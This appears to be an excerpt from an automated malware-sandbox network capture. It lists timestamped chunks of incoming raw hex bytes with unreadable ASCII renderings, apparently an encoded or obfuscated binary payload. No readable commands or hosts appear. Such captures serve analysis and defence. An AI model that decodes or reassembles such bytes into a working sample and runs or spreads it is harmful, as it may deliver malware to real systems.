                                                        2023-02-22 07:36:37 UTC444INData Raw: c4 e6 30 bf be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 e3 d5 e6 03 be be c4 e6 32 bf be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 e3 d6 e6 33 bf be c4 e6 04 be be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 e3 d7 e6 35 bf be c4 e6 34 bf be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 d1 be f6 be be be be cf be 32 c1 be be d9 e8 be be be d1 ee c1 be d2 be be be c7 be be cf c0 e6 05 be be c4 4c d4 bc c1 d1 be f6 be be be be cf be e8 d1 ee c0 be d3 be be be c7 be be cf f6 c1 be be be cf be e8 c0 e6 d7 be be c8 d1 be f6 ae bd bd bd be be be d1 ee c2 be 2c be be be c8 be be cf f6 f0 be be be bc ca be be 03 bf be be be c3 be be be f6 be be be be cf bf 33 c0 be be d9 e8 cf c0 32 c0 be be d9 e6 2d bf be c4 e6 06 be be
                                                        Data Ascii: 0'`2'`3'`54'`2L,32-
                                                        2023-02-22 07:36:37 UTC445INData Raw: e6 3c bf be c4 e6 0c be be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 e6 f1 be be c4 d1 c3 f6 14 bb bd bd c2 c1 e6 f9 bf be c4 f6 3d bd bd bd cf cd f7 08 bc bd bd f6 c6 bd bd bd c0 c2 c1 e6 f8 be be c4 f6 69 bd bd bd cf c6 d1 c7 de c3 be be be 3c 09 bf be c2 f7 89 ba bd bd e4 de bf be be be f6 7e ba bd bd e8 cf ca f7 0d bd bd bd de ca be be be f6 6c ba bd bd e6 09 be be c4 d1 be de c6 be be be f6 5b ba bd bd c0 c2 c1 e6 f8 be be c4 f6 8e bd bd bd be be d1 ee c6 be 41 bf be be c7 be be cf e6 12 be be c4 de a6 c1 be be e6 4c be be c4 e6 f1 be be c4 e6 13 be be c4 de a6 c1 be be e6 4c be be c4 e6 0b be be c4 1e e6 14 be be c4 de a6 c1 be be e6 4c be be c4 e6 f1 be be c4 1e e6 47 bf be c4 de a6 c1 be be e6 4c be be c4 e6 0b be be c4 1e e6 15 be be c4
                                                        Data Ascii: <'=i<~l[ALLLGL
                                                        2023-02-22 07:36:37 UTC447INData Raw: bd bd e4 f6 73 bc bd bd d5 d1 c4 f6 fe be be be e6 36 bf be c4 d1 c0 de bf be be be 3c fe bf be c2 f8 59 bc bd bd e4 de bf be be be f6 4e bc bd bd cf c5 32 fb be be bf 2d fc be be c8 d1 c6 f6 8a bd bd bd cf c7 f7 cd be be be f6 76 bd bd bd 9b e8 be be be f6 be be be be d4 d1 c4 f6 be be be be 9b d6 be be be e4 f6 be be be be d4 d1 c4 f6 be be be be 9b c3 be be be f6 be be be be cf c4 e8 ff f2 be be c0 be be be f4 be be be 46 be be be 7c be be be 0d be be be be be be be be be be be bf be be be 7e bf be be 7f bf be be d1 be be be ca be be bf ec c0 e6 fd be be c8 4c d4 bc c1 e8 70 f6 bf be be be e8 3c c6 be be c2 db e6 ef be be c8 e6 ff be be c4 c0 e6 3d bf be c4 e6 f2 be be c8 d5 e6 29 be be c4 f6 97 bd bd bd be be be d9 ee c2 be 13 c1 be be ce be be cf de
                                                        Data Ascii: s6<YN2-vF|~Lp<=)
                                                        2023-02-22 07:36:37 UTC448INData Raw: be c8 3e c9 be be c2 f6 a2 bd bd bd e6 60 c3 be c4 f6 be be be be e6 e6 c4 be c4 de be be be be 3c ec bf be c2 f7 76 bd bd bd e4 f6 6c bd bd bd be dc be e6 2e bf be c4 e8 e4 3c ca be be c2 d2 bc bf e8 be be d8 3c ca be be c2 e8 be dc be e6 2f bf be c4 e8 dc be e6 31 bf be c4 e8 dc be e6 34 bf be c4 e8 ec be bc c7 be be e6 fd be be c8 e8 fc be bc c7 be be bc c7 bf be e6 4e be be c4 e8 fc be bc c7 be be bc c7 bf be e6 ec be be c8 e8 ec be bc c7 be be e6 eb be be c8 e8 dc be e6 f3 be be c4 e8 dc be e6 3a bf be c4 e8 ec be bc c7 be be e6 f1 be be c4 e8 dc be e6 39 bf be c4 e8 1c be bc c7 be be bc c7 bf be bc c7 c0 be bc c7 c1 be e6 f2 be be c8 e8 ec be bc c7 be be e6 f1 be be c8 e8 dc be e6 41 bf be c4 e8 08 bc c7 be be bc c7 bf be bc c7 c0 be 2d f0 be be c8
                                                        Data Ascii: >`<vl.<</14N:9A-
                                                        2023-02-22 07:36:37 UTC449INData Raw: be be be bc cc c6 be f6 58 bc bd bd f6 b9 bf be be de c9 be be be 3c 1d bf be c2 f8 48 bc bd bd e4 de cb be be be f6 3d bc bd bd cf ce f7 8d bf be be f6 be be be be cf c8 d5 16 d1 c8 f6 88 bd bd bd f6 2c bf be be de cf be be be f6 17 bc bd bd cf c3 d5 16 d1 c3 f6 a4 bd bd bd cf d1 d5 17 d1 d1 de be be be be 3c 3e bf be c2 f8 f7 bc bd bd e4 f6 ed bc bd bd de cf c6 be be d1 c1 de c6 be be be f6 e0 bc bd bd cf bf d1 c8 de c2 be be be bc cc c6 be f6 ca bc bd bd cf c3 d5 17 d1 c3 de cd be be be bc cc c6 be f6 b6 bb bd bd cf bf cf bf de a3 d0 be be 19 de a3 d0 be be 18 cf bf 1f 16 d1 bf f6 44 bc bd bd cf bf cf bf de 5c 2f cb be 19 de 5c 2f cb be 18 cf bf 1f 16 d1 bf f6 88 bd bd bd cf cb f6 47 bf be be f6 30 bf be be e1 be be be be be be c6 fe e1 be be be be be
                                                        Data Ascii: X<H=,<>D\/\/G0
                                                        2023-02-22 07:36:37 UTC451INData Raw: 82 bc bf d1 cd f6 44 be be be f6 e7 be be be f6 32 bc bd bd d0 c5 e6 c8 be be c8 d1 bf f6 f5 bd bd bd de b1 e4 f8 bf d1 c5 f6 05 be be be f6 81 bd bd bd f6 66 bc bd bd cf ca dd d3 bc c2 d1 cb de c5 be be be bc cc c4 be f6 a4 ba bd bd cf c0 dd 1f 16 dd 1f 17 cf c0 19 d1 c5 de c9 be be be 3c f5 bf be c2 f8 8c ba bd bd e4 de c3 be be be f6 81 ba bd bd d0 c5 e6 c8 be be c8 d1 bf f6 20 be be be d4 d1 ca de c1 be be be f6 66 ba bd bd cf cd f8 07 bc bd bd de c7 be be be f6 55 ba bd bd be 31 4d be be c4 d1 ce f6 be be be be cf ce 33 ca be be c0 cf be 32 bf be be bf c0 e6 49 be be c4 f6 be be be be 9b 12 bc bd bd e4 f6 be be be be 9b 07 bc bd bd f6 02 bc bd bd cf c0 d1 c6 f6 ee be be be de 5f 7e 6f f5 d1 c0 de bf be be be 3c f1 bf be c2 f8 fb ba bd bd e4 de be be
                                                        Data Ascii: D2f< fU1M32I_~o<
                                                        2023-02-22 07:36:37 UTC452INData Raw: be 3c 0e bf be c2 f8 cd be be be e4 f6 c3 be be be f6 8a bd bd bd bc ca be be 03 bf be be be c3 be be be f6 be be be be e8 be d1 ee c1 be ce bf be be d4 be be cf de c2 be be be bc cc be be f6 be be be be bc ca be be 03 c3 be be be 26 be be be 49 be be be f9 be be be c3 be be be 5e be be be f6 21 be be be d4 3e d1 be be c2 f6 de be be be d4 3e d2 be be c2 de c0 be be be 3c 13 bf be c2 f8 80 bd bd bd e4 de be be be be f6 75 bd bd bd d4 3e d2 be be c2 f6 4d be be be c0 e6 4f be be c4 f6 f7 be be be c0 4c 27 4b d1 be be bf 3e d5 be be c2 de bf be be be 3c 32 bf be c2 f8 43 bd bd bd e4 f6 39 bd bd bd de be bf be be 4b ee be be bf 3e d4 be be c2 f6 88 bd bd bd cf bf e8 3c d5 be be c2 d1 bf f6 af bd bd bd e6 66 be be c4 f6 be be be be d4 3e d1 be be c2 f6 2e bd
                                                        Data Ascii: <&I^!>><u>MOL'K><2C9K><f>.
                                                        2023-02-22 07:36:37 UTC453INData Raw: be e6 4c be be c4 e6 fd be be c8 4c d4 bc c1 1e d1 c0 f6 f9 be be be bc ca bf be 03 bf be be be dd be be be f6 d8 be be be f6 ee be be be de be be be be 3c ef bf be c2 f7 9c bd bd bd e4 f6 92 bd bd bd de 9e 51 c2 be e6 d6 be be c8 f6 ca be be be cf c0 f8 a8 bd bd bd f6 89 bd bd bd 9b 78 bc bd bd e4 f6 be be be be 9b 6d bc bd bd de be be be be 3c f7 bf be c2 f8 4f bc bd bd e4 f6 45 bc bd bd e8 be ff f2 be be be be be be 12 be be be c8 bf be be 1c bf be be c9 be be be ca be be bf be be be be d6 be be be cf be be be e7 be be be c9 be be be ca be be bf d1 ee c5 be 65 bf be be d8 be be cf f6 74 be be be bc ca be be 03 c3 be be be 79 be be be 6d be be be de be be be 7a be be be 07 be be be f6 74 be be be cf c2 f7 6e be be be f6 8f be be be de a6 c1 be be e6 72
                                                        Data Ascii: LL<Qxm<OEetymztnr
                                                        2023-02-22 07:36:37 UTC455INData Raw: da bf be be f6 49 be be be f6 98 be be be cf c0 2a e1 7f 42 8e 17 6a be 6c f9 bc bf d1 c6 de c2 be be be bc cc be be f6 70 bd bd bd dd ed d1 c0 de c0 be be be f6 66 bd bd bd e1 58 57 57 57 57 57 77 fd e6 79 be be c4 e6 1a be be c8 d1 c1 f6 ca be be be cf c6 f8 4b be be be f6 62 bd bd bd d6 4b c8 be be bf e3 d4 cf c0 5c e3 d5 de 8c 00 c5 be 5c d1 c2 f6 cc be be be d0 c5 e6 c8 be be c8 d1 bf f6 62 bd bd bd 31 c7 be be c8 d1 c3 f6 e9 be be be cf c7 33 c6 be be c0 3c cd be be c2 3c c6 be be c2 2d ef be be c4 de be be be be 3c e2 bf be c2 f7 e7 bd bd bd e4 f6 dd bd bd bd cf c2 32 bf be be d9 cf c3 33 d7 be be bf d4 d6 2d ca be be c8 52 d1 c4 f6 f0 bd bd bd de bd e8 bf be d1 c5 f6 50 bd bd bd cf c0 de 6f d2 c9 be 16 d1 c0 de bf be be be 3c f0 bf be c2 f8 9f bc
                                                        Data Ascii: I*BjlpfXWWWWWwyKbK\\b13<<-<23-RPo<
                                                        2023-02-22 07:36:37 UTC456INData Raw: be bc c7 be be e6 fb be be c4 e8 fc be bc c7 be be bc c7 bf be e6 c5 be be c8 e8 dc be e6 26 be be c8 e8 dc be e6 5b be be c4 e8 dc be e6 6b bf be c4 e8 dc be e6 6d bf be c4 e8 dc be e6 60 c3 be c4 e8 dc be e6 6e bf be c4 e8 c4 e8 be be d1 ee c1 be 05 be be be bf be be cf e6 60 c3 be c4 f6 be be be be e6 84 be be c4 f6 be be be be c0 e6 c6 be be c8 de be be be be 3c 06 bf be c2 f7 cd be be be e4 f6 c3 be be be f6 8a bd bd bd bc ca be be 03 bf be be be c3 be be be f6 be be be be e8 be dc be e6 e6 c4 be c4 e8 e4 3c d8 be be c2 d2 bc bf e8 be be d8 3c d8 be be c2 e8 be 0c f6 bf be be be e8 c0 c1 c2 e6 8b be be c4 f6 b0 bd bd bd d1 ee c1 be cf be be be bf be be cf c0 c1 e6 97 be be c4 d1 be f6 be be be be cf be e8 be be be d1 ee c1 be cf be be be df be be cf
                                                        Data Ascii: &[km`n`<<<
                                                        2023-02-22 07:36:37 UTC457INData Raw: fe 2d e2 bf be c4 d1 cc f6 f5 c0 be be 31 e6 be be c8 38 cf d1 dd e6 94 d1 d1 de c0 be be be f6 c8 bd bd bd cf c3 d1 cc f6 61 bd bd bd 3c e3 be be c2 3d e9 be be c2 39 ec be be c2 cf c6 2d ce bf be c4 d4 bc c1 d1 e0 de c9 be be be f6 9a bc bd bd e6 9f be be c4 f6 6a c2 be be cf cc e6 8a be be c4 d1 d4 de d0 be be be f6 7d bc bd bd cf c9 d1 df de cc be be be f6 6f bc bd bd f6 17 bf be be f6 b7 c2 be be cf f7 d1 ea de e2 be be be f6 57 bc bd bd c2 cf c2 dd 12 94 e6 9d be be c4 d1 cb de df be be be f6 40 bc bd bd c2 cf e8 cf eb 33 c0 be be d9 d4 cf eb 32 c0 be be d9 4c 27 e6 30 be be c8 f6 64 bf be be cf d7 d1 f8 f6 5b c0 be be 31 e6 be be c8 38 c2 dd fa e6 9d be be c4 d1 c2 f6 d6 c1 be be 31 e6 be be c8 38 3c e6 be be c2 3d e9 be be c2 39 ec be be c2 cf cc
                                                        Data Ascii: -18a<=9-j}oW@32L'0d[1818<=9
                                                        2023-02-22 07:36:37 UTC459INData Raw: c7 2d de bf be c4 d4 bc bf d1 d5 de c1 be be be f6 7e b7 bd bd c2 cf d1 dd ce 94 e6 88 be be c4 d1 e7 f6 ee be be be c2 cf d1 dd ca 94 e6 88 be be c4 d1 e6 de dc be be be bc cc f0 be f6 4d b7 bd bd cf da f7 f5 b9 bd bd f6 ea b9 bd bd cf cf d1 e3 f6 8f bb bd bd c2 cf d1 dd d2 94 e6 88 be be c4 d1 e8 f6 2f ba bd bd cf c1 d1 da de be be be be 3c 07 bf be c2 f8 17 b7 bd bd e4 f6 0d b7 bd bd cf ee f8 5c bd bd bd de d5 be be be bc cc f0 be f6 f8 b7 bd bd cf dd f7 63 bc bd bd f6 58 bc bd bd de 71 be be be 4b c8 be be bf 3e d9 be be c2 f6 d1 bd bd bd cf ea f8 00 bb bd bd f6 73 b9 bd bd d4 d1 cd de db be be be f6 c3 b7 bd bd 9b 6d b6 bd bd d1 f2 de be be be be 3c 33 bf be c2 f7 c8 be be be e4 f6 be be be be bc ca e9 be 03 c1 be be be cf be be be c3 be be be 38 be
                                                        Data Ascii: -~M/<\cXqK>sm<38
                                                        2023-02-22 07:36:37 UTC460INData Raw: be be e6 e6 c4 be c4 f6 be be be be c0 e6 c6 be be c8 de be be be be 3c e9 bf be c2 f8 d2 be be be e4 de be be be be f6 c7 be be be f6 85 bd bd bd bc ca be be 03 bf be be be c3 be be be f6 be be be be e8 d1 ee c2 be 2c be be be bf be be cf f6 ef be be be bc ca be be 03 bf be be be ed be be be f6 e8 be be be e6 e6 c4 be c4 de be be be be 3c fb bf be c2 f8 9c bd bd bd e4 de be be be be f6 91 bd bd bd e6 60 c3 be c4 f6 95 bd bd bd e8 e6 ad be be c4 e6 72 bf be c4 e6 bd be be c4 e6 76 bf be c4 e6 72 bf be c4 e6 bd be be c4 e6 c2 be be e9 3e de be be c2 f6 90 bd bd bd be be e4 3c df be be c2 d2 bc bf e8 be be d8 3c df be be c2 e8 be dc be e6 71 bf be c4 e8 d1 ee c0 be cf be be be e5 be be cf cd be e6 b7 be be c4 d1 be f6 be be be be cf be e8 be be be d1 ee c1
                                                        Data Ascii: <,<`rvr><<q
                                                        2023-02-22 07:36:37 UTC461INData Raw: bc cc be be f6 be be be be bc ca be be 03 c0 be be be c3 be be be 27 be be be f6 be be be be e6 da bf be c4 f6 be be be be e6 71 bf be c4 e6 72 bf be c4 e6 bd be be c4 e6 7e bf be c4 e6 72 bf be c4 e6 bd be be c4 e6 c5 be be e9 3e e6 be be c2 f6 be be be be e6 db bf be c4 e6 dc bf be c4 e6 bd be be c4 e6 7f bf be c4 e6 72 bf be c4 e6 bd be be c4 e6 c6 be be e9 3e e7 be be c2 f6 dd be be be e6 d9 bf be c4 de be be be be 3c 16 bf be c2 f8 34 bd bd bd e4 de be be be be f6 29 bd bd bd e8 e4 3c e8 be be c2 d2 bc bf e8 be be d8 3c e8 be be c2 e8 be dc be e6 60 c3 be c4 e8 dc be e6 e6 c4 be c4 e8 dc be e6 71 bf be c4 e8 dc be e6 72 bf be c4 e8 d1 ee c1 be 05 be be be bf be be cf e6 e7 bf be c4 f6 be be be be e6 e8 bf be c4 f6 be be be be c0 e6 c6 be be c8 de be
                                                        Data Ascii: 'qr~r>r><4)<<`qr
                                                        2023-02-22 07:36:37 UTC463INData Raw: be be c2 e6 c5 be be c8 e6 5a be be c4 f8 b4 be be be f6 69 be be be cf be f7 5a be be be de be be be be 3c 37 bf be c2 f7 4e bd bd bd e4 de be be be be f6 43 bd bd bd d9 4b d1 be be bf e3 8e 0b be be c2 e6 0a bf be c4 e6 09 bf be c4 f8 73 be be be de bf be be be 3c 02 bf be c2 f8 19 bd bd bd e4 f6 0f bd bd bd da 4b d1 be be bf e3 8e 13 be be c2 e6 0a bf be c4 e6 5a be be c4 f8 43 be be be f6 2d bd bd bd be c0 c1 e6 0b bf be c4 f6 be be be be d5 d1 c0 f6 be be be be 9b 49 be be be e4 f6 be be be be d4 d1 c0 f6 be be be be 9b 36 be be be f6 be be be be d4 d1 c0 f6 0c be be be dc 4b d1 be be bf e3 8e 09 be be c2 e6 c5 be be c8 e6 5a be be c4 f8 e9 be be be de c0 be be be f6 94 bc bd bd dd c7 4b d1 be be bf e3 8e 0a be be c2 e6 0a bf be c4 e6 09 bf be c4 f6
                                                        Data Ascii: ZiZ<7NCKs<KZC-I6KZK
                                                        2023-02-22 07:36:37 UTC464INData Raw: 27 d5 17 58 3e 00 be be c2 f6 5d bd bd bd cf be f7 56 bd bd bd f6 6f bd bd bd 3c 01 be be c2 d1 be de be be be be 3c 40 bf be c2 f7 29 bd bd bd e4 de be be be be f6 1e bd bd bd e8 be d1 ee c2 be 44 be be be bf be be cf de bf be be be bc cc be be f6 be be be be bc ca be be 03 c0 be be be 1b be be be c3 be be be f6 16 be be be e6 16 bf be c4 de be be be be 3c ef bf be c2 f7 98 bd bd bd e4 f6 8e bd bd bd e6 17 bf be c4 2d e8 be be c8 3e 03 be be c2 f6 be be be be e8 de c4 de be be 4b d1 be be bf e3 8e 0f be be c2 e6 c5 be be c8 e6 2d bf be c4 e6 4e be be c4 3e fa be be c2 f6 80 bd bd bd e6 e6 c4 be c4 f6 8b bd bd bd be be e4 3c 04 be be c2 d2 bc bf e8 be be d8 3c 04 be be c2 e8 be ec be bc c7 be be e6 07 be be c8 e8 dc be e6 f8 bf be c4 e8 dc be e6 84 bf be
                                                        Data Ascii: 'X>]Vo<<@)D<->K-N><<
                                                        2023-02-22 07:36:37 UTC466INData Raw: 67 e2 be be dd 2c e6 24 bf be c4 e8 48 3c 1c be be c2 dd cb 58 e3 f8 d1 be be be e4 f6 be be be be dd cb de d5 e3 be be d6 e6 24 bf be c4 e8 be 4c 3c 1c be be c2 dd cc 58 e3 f8 d2 be be be e4 f6 be be be be dd cc de d7 e3 be be dd 0d e6 8e bf be c4 e8 48 3c 1c be be c2 dd cd 58 e3 f8 d1 be be be e4 f6 be be be be dd cd de 26 e3 be be d5 e6 8e bf be c4 e8 be 4c 3c 1c be be c2 dd ce 58 e3 f8 d2 be be be e4 f6 be be be be dd ce de 27 e3 be be dd 18 e6 8e bf be c4 e8 48 3c 1c be be c2 dd cf 58 e3 f8 d1 be be be e4 f6 be be be be dd cf de 81 e3 be be d4 e6 8e bf be c4 e8 be 60 3c 1c be be c2 dd d0 58 e3 f7 c3 be be be f6 d2 be be be e4 f6 be be be be dd d0 de 81 e3 be be dd e9 e6 8e bf be c4 e8 be be be 5c 3c 1c be be c2 dd d1 58 e3 f7 c3 be be be f6 d1 be be
                                                        Data Ascii: g,$H<X$L<XH<X&L<X'H<X`<X\<X
                                                        2023-02-22 07:36:37 UTC467INData Raw: e3 f7 c3 be be be f6 d1 be be be e4 f6 be be be be dd ef de e7 e6 be be da e6 24 bf be c4 e8 5c 3c 1c be be c2 dd f0 58 e3 f7 c3 be be be f6 d1 be be be e4 f6 be be be be dd f0 de ed e6 be be d9 e6 8e bf be c4 e8 4c 3c 1c be be c2 dd f1 58 e3 f8 d2 be be be e4 f6 be be be be dd f1 de f2 e6 be be dd 36 e6 8e bf be c4 e8 4c 3c 1c be be c2 dd f2 58 e3 f8 d2 be be be e4 f6 be be be be dd f2 de 6a e6 be be dd cc e6 8e bf be c4 e8 4c 3c 1c be be c2 dd f3 58 e3 f8 d2 be be be e4 f6 be be be be dd f3 de 78 e6 be be dd 2c e6 8e bf be c4 e8 4c 3c 1c be be c2 dd f4 58 e3 f8 d2 be be be e4 f6 be be be be dd f4 de e6 e7 be be dd d2 e6 8e bf be c4 e8 4c 3c 1c be be c2 dd f5 58 e3 f8 d2 be be be e4 f6 be be be be dd f5 de fa e7 be be dd dc e6 8e bf be c4 e8 4c 3c 1c be
                                                        Data Ascii: $\<XL<X6L<XjL<Xx,L<XL<XL<
                                                        2023-02-22 07:36:37 UTC468INData Raw: c4 e8 4c 3c 1c be be c2 dd 14 58 e3 f8 d2 be be be e4 f6 be be be be dd 14 de 45 fe be be dd c8 e6 24 bf be c4 e8 4c 3c 1c be be c2 dd 15 58 e3 f8 d2 be be be e4 f6 be be be be dd 15 de 4f fe be be dd e6 e6 24 bf be c4 e8 60 3c 1c be be c2 dd 16 58 e3 f7 c3 be be be f6 d2 be be be e4 f6 be be be be dd 16 de 77 fe be be dd d6 e6 24 bf be c4 e8 be be be 4c 3c 1c be be c2 dd 17 58 e3 f8 d2 be be be e4 f6 be be be be dd 17 de 8f fe be be dd e2 e6 24 bf be c4 e8 60 3c 1c be be c2 dd 18 58 e3 f7 c3 be be be f6 d2 be be be e4 f6 be be be be dd 18 de b3 fe be be dd da e6 24 bf be c4 e8 be be be 4c 3c 1c be be c2 dd 19 58 e3 f8 d2 be be be e4 f6 be be be be dd 19 de cf ff be be dd ce e6 8e bf be c4 e8 60 3c 1c be be c2 dd 1a 58 e3 f7 c3 be be be f6 d2 be be be e4
                                                        Data Ascii: L<XE$L<XO$`<Xw$L<X$`<X$L<X`<X
                                                        2023-02-22 07:36:37 UTC470INData Raw: be be bf e6 e4 be be c8 e6 54 be be c8 f7 c6 be be be d8 d1 c8 f6 f3 bf be be cf c6 8e c8 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c6 be be be d9 d1 c8 f6 d5 bf be be cf c6 8e ee be be bf e6 e4 be be c8 e6 54 be be c8 f7 c6 be be be da d1 c8 f6 b7 be be be cf c6 8e 02 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c6 be be be db d1 c8 f6 99 be be be cf c6 8e 24 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c6 be be be dc d1 c8 f6 7b be be be cf c6 8e 07 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c7 be be be dd c7 d1 c8 f6 5c be be be cf c6 8e d6 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c7 be be be dd c8 d1 c8 f6 3d be be be cf c6 8e c5 be be bf e6 e4 be be c8 e6 54 be be c8 f7 c7 be be be dd c9 d1 c8 f6 1e be be be cf c6 8e e6 be be bf e6 e4 be be c8 e6 54 be be
                                                        Data Ascii: TTTT$T{T\T=TT
                                                        2023-02-22 07:36:37 UTC471INData Raw: 49 be be c2 c4 39 70 be be c2 cf d3 2d 61 be be c8 cf d2 d5 16 d1 d2 cf d2 cf c3 fd 82 bc bd bd 3c 1e be be c2 c0 c4 60 31 af c2 be c4 d1 da cf da c4 3b 7b be be c2 c4 39 6f be be c2 2d 50 be be c8 d1 db d4 d1 dc d4 d1 dd c4 39 6f be be c2 33 de be be bf f7 e9 be be be c4 39 6f be be c2 32 de be be bf d1 de cf de 2d 62 be be c8 8e c1 be be bf e6 e4 be be c8 e6 63 be be c8 f7 c1 be be be d5 d1 dc c4 39 6f be be c2 2d 64 be be c8 f7 1f be be be cf da cf db 4c 27 4b f6 be be c0 3b 7c be be c2 d4 d1 df f6 f7 be be be cf db cf df 58 2d 51 be be c8 d1 e0 cf da 39 7c be be c2 cf df cf e0 c1 cf df 58 e6 b6 bf be c4 60 cf e0 2d 52 be be c8 f7 c4 be be be cf dd d5 16 d1 dd cf df d5 16 d1 df cf df cf db 4c 27 fd 7a bd bd bd f6 82 be be be cf da cf db 4c 27 d5 16 4b
                                                        Data Ascii: I9p-a<`1;{9o-P9o39o2-bc9o-dL'K;|X-Q9|X`-RL'zL'K
                                                        2023-02-22 07:36:37 UTC472INData Raw: 6a bd bd bd cf be 2d 6c be be c8 f6 be be be be cf bf e6 95 bf be c4 f6 07 be be be 8e f4 be be c0 e6 e4 be be c8 2d 46 be be c8 30 fb be be 2e e6 9c bf be c4 31 6d be be c8 d1 be de bf be be be e6 9a bf be c4 f8 27 bd bd bd e4 de be be be be f6 1c bd bd bd 3c 1f be be c2 f8 c3 be be be f6 75 bd bd bd e8 be d1 ee c3 be b5 c0 be be f4 be be cf f6 95 c0 be be bc ca c6 be 03 cd be be be 2b bf be be 4e be be be 56 be be be cb bf be be cd be be be c3 be be be 1b c0 be be 0f bf be be d5 be be be f9 be be be 3c bf be be b4 bf be be 5d c0 be be e6 bf be be fd c0 be be f6 26 bf be be f6 f3 c0 be be f6 32 c0 be be d4 d1 c0 f6 46 bf be be cf c0 cf bf fd ab be be be de c0 be be be f6 53 bd bd bd cf c4 cf c7 16 d1 c4 de cb be be be f6 42 bd bd bd d4 d1 c5 de c3 be be
                                                        Data Ascii: j-l-F0.1m'<u+NV<]&2FSB
                                                        2023-02-22 07:36:37 UTC473INData Raw: be c8 e8 be be be d1 ee c1 be 37 be be be bf be be cf f6 0d be be be bc ca be be 03 c0 be be be da be be be c3 be be be f6 d5 be be be d2 3e 1f be be c2 de be be be be d5 f8 9b bd bd bd e4 f6 91 bd bd bd d4 3e 23 be be c2 f6 ea be be be d2 3e 1e be be c2 de bf be be be d4 f7 79 bd bd bd e4 f6 6f bd bd bd e6 a1 bf be c4 f6 bf be be be e8 e6 e6 c4 be c4 f6 92 bd bd bd d5 4a c8 be be bf 3e 24 be be c2 f6 a3 bd bd bd be be be e4 3c 26 be be c2 d2 bc bf e8 be be d8 3c 26 be be c2 e8 be f8 bc c7 be be bc c7 bf be 2d 73 be be c8 e8 be e8 bc c7 be be 2d 4c be be c8 e8 be ec be bc c7 be be e6 96 bf be c4 e8 e8 bc c7 be be 2d 5d be be c8 e8 be dc be e6 e6 c4 be c4 e8 dc be e6 60 c3 be c4 e8 d1 ee c1 be 01 be be be bf be be cf e6 60 c3 be c4 f6 be be be be e6 b9 bf
                                                        Data Ascii: 7>>#>yoJ>$<&<&-s-L-]``
                                                        2023-02-22 07:36:37 UTC475INData Raw: c9 be be 33 ca be be 5d c0 be be 7f c5 be be 34 c7 be be 83 c1 be be bf c3 be be 14 cc be be 99 c2 be be df c6 be be 78 c9 be be 2d be be be 15 c9 be be fa c3 be be fb c1 be be 67 c8 be be 72 c2 be be b9 be be be bc be be be 49 c1 be be 23 cb be be 0f c1 be be 3e c8 be be 24 ca be be 55 c9 be be 55 c3 be be 4e cc be be 9d c1 be be e1 ca be be ee bf be be 79 c1 be be 9c c8 be be c4 c5 be be b2 c2 be be b5 c7 be be 41 ca be be 99 cb be be 2e c9 be be 85 cc be be d3 c2 be be 40 c5 be be 07 c7 be be 23 c2 be be 04 cb be be e1 cc be be f2 c4 be be e6 c2 be be 24 c9 be be 09 c3 be be 3c bf be be 35 c2 be be 69 c9 be be e2 c3 be be f5 cb be be 74 bf be be 27 cc be be 54 c6 be be f0 c3 be be b6 c5 be be bd c9 be be 4a c5 be be 18 c4 be be b2 bf be be 1a be be be
                                                        Data Ascii: 3]4x-grI#>$UUNyA.@#$<5it'TJ
                                                        2023-02-22 07:36:37 UTC476INData Raw: c0 de e2 be be be e6 ba bf be c4 f8 1b b8 bd bd e4 f6 11 b8 bd bd f6 11 be be be f6 fe ba bd bd f6 07 be be be de f9 be be be f6 fc b8 bd bd cf c7 da f9 63 c2 be be de fb be be be f6 ea b8 bd bd c1 63 c5 be be bf f7 a9 bc bd bd f6 90 c0 be be cf c8 dd c9 f9 a5 bd bd bd f6 b2 c4 be be f6 c8 be be be de c3 be be be f6 bd b7 bd bd c0 2d 52 be be c8 f7 0a ba bd bd f6 c1 c0 be be cf ce dd c7 fe 8c bb bd bd de e6 be be be f6 9a b7 bd bd f6 96 bd bd bd f6 4f c2 be be f6 8c bd bd bd f6 77 c3 be be f6 82 bd bd bd f6 32 be be be f6 a4 bf be be de ca be be be f6 6d b7 bd bd cf c6 d7 f9 6b c3 be be f6 ae c4 be be c1 63 c5 be be bf f8 dc c2 be be f6 64 c0 be be d5 d5 31 16 c0 be c4 d1 c0 de 05 be be be f6 3d b7 bd bd cf c4 dd cd f9 f3 c2 be be f6 d6 bb bd bd f6 2b bd
                                                        Data Ascii: cc-ROw2mkcd1=+
                                                        2023-02-22 07:36:37 UTC477INData Raw: dd cd f9 03 c2 be be de de be be be e6 ba bf be c4 f8 bc b2 bd bd e4 de c3 be be be f6 b1 b2 bd bd c1 63 22 be be bf dd cd 31 16 c0 be c4 d1 c0 de dd be be be e6 ba bf be c4 f8 93 b2 bd bd e4 f6 89 b2 bd bd cf d0 dd cd fe 96 b4 bd bd de c9 be be be e6 ba bf be c4 f8 75 b2 bd bd e4 de c0 be be be f6 6a b2 bd bd f6 66 b8 bd bd f6 be be be be d4 d6 31 16 c0 be c4 d1 c0 de 0c be be be f6 4d b2 bd bd f6 49 b8 bd bd f6 15 ba bd bd c1 63 12 be be bf d4 bc bf d4 bc bf 31 11 c0 be c4 d1 c0 f6 db bd bd bd c1 63 12 be be bf dd cd 31 16 c0 be c4 d1 c0 f6 c6 b5 bd bd d5 da 31 17 c0 be c4 d1 c0 de 0e be be be e6 ba bf be c4 f8 ff b2 bd bd e4 f6 f5 b2 bd bd f6 e8 bf be be f6 17 be be be cf ca dd c9 f9 44 b8 bd bd f6 30 be be be c1 63 ee be be bf dd cd 31 16 c0 be c4 d1
                                                        Data Ascii: c"1ujf1MIc1c11D0c1
